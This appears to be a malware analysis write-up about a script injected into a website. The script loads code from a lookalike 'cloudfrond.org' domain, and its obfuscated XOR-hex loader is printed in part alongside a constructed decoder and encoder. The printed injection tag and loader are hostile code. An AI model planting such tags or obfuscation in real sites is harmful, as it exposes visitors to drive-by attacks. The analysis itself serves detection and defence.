Research on a Suspicious Payload
A One-Letter Difference
When we find a suspicious payload, we try to study it. It may not raise any alarms during detection, but that does not mean it is harmless.
A payload found on a website is an excellent example:
<!-- [if IE]><script type="text/javascript" src="hxxp://cloudfrond.org/golden.phtml"></script> <![endif]-->
It looks okay, right? CloudFront is Amazon's CDN service, which is very secure... Please take a closer look. CloudFrond vs. CloudFront: a single letter separates the two. Overlook that one letter and you may be fooled.
Analyzing the Payload
Now let's take a look at what the script loads:
/*jskdljgdlkfjgdlkfg*/XJHNOs=print;rNjoDPv=String;RlH=rNjoDPv["fromCharCode"];crgLMK=parseInt;utO=function(a,b){return a.charAt(b);};var dOK='';var Glg='7d3d099208132cbb18d70636c524b94077a6e879d602dbfa0813ff71fd18bf53005c3a50932616ee71ad68bf114f9b6349e5431abc4509b7ad5e054778acbad4c34806e724b3eb7913224c745465249d8d6456f5b3442031ce9422be75f678e7b0c63fe25b3ad7a0c2935b2338079d55a1a972dafc0a1cfdf32f6151017843c3fba4e33a0c11517839376a3372772d557b98';var SUTbVRi='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';var w=0x0+0;for(var i=0;i<(Glg.length/2);i++){dOK+=RlH(crgLMK(utO(Glg,w)+utO(Glg,w+1),0x8+8)^crgLMK(utO(SUTbVRi,w)+utO(SUTbVRi,w+1),0x0F+1));w+=2;
The above is actually a custom encoded script, and the content loaded on each access is different (it is a payload that varies according to conditions).
If you access it with IE, only the variable names change. If you use another browser, or access it with a different User-Agent, the output becomes completely unpredictable:
If we access it with IE, we can decode the content obtained. Although it looks very suspicious, we have not found any malicious payload in it. Below is the traffic capture we intercepted:
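As an added example (not code from the original page or from the sample), here is a cleaned-up version of the decoding routine in the loader above, plus the inverse used only to build a constructed sample; the key and plaintext below are constructed, not the real SUTbVRi value.

```javascript
// Decoder for the scheme used by the loader: both the data string (Glg in the
// sample) and the key string (SUTbVRi) are hex. Each pair of hex characters is
// parsed with parseInt(x, 16) and the two bytes are XORed; the result is fed
// to String.fromCharCode. In the sample, 0x8+8 and 0x0F+1 are just 16 written
// obscurely, and the single-letter aliases (RlH, crgLMK, utO) hide the builtins.
function xorHexDecode(dataHex, keyHex) {
  if (dataHex.length % 2 !== 0 || keyHex.length < dataHex.length) {
    throw new Error("data must be whole hex bytes and key at least as long");
  }
  let out = "";
  for (let w = 0; w < dataHex.length; w += 2) {
    const d = parseInt(dataHex.slice(w, w + 2), 16);
    const k = parseInt(keyHex.slice(w, w + 2), 16);
    out += String.fromCharCode(d ^ k);
  }
  return out;
}

// Inverse of the above, used here only to build a constructed sample.
function xorHexEncode(plain, keyHex) {
  if (keyHex.length < plain.length * 2) {
    throw new Error("key must cover every plaintext byte");
  }
  let out = "";
  for (let i = 0; i < plain.length; i++) {
    const k = parseInt(keyHex.slice(i * 2, i * 2 + 2), 16);
    out += (plain.charCodeAt(i) ^ k).toString(16).padStart(2, "0");
  }
  return out;
}

// Constructed sample (assumption: not the real key or payload from the page).
const SAMPLE_KEY =
  "a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f90";
const SAMPLE_PLAIN = "document.write('<iframe>')";
const SAMPLE_CIPHER = xorHexEncode(SAMPLE_PLAIN, SAMPLE_KEY);

// Round-trip on the constructed sample; an analyst would feed the real
// Glg and SUTbVRi strings captured from the site into xorHexDecode instead.
function decodeSample() {
  return xorHexDecode(SAMPLE_CIPHER, SAMPLE_KEY);
}
```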
Here, it uses a 1-pixel iframe to load a certain Google webpage before loading its next function.
However, that function returns a 404. We guess the referenced function has become unavailable, or the attackers have already taken it down.
The code also shows two main functions:
1. Create an iframe.
2. Hide the URL inside the iframe using the same encoding method as the main payload.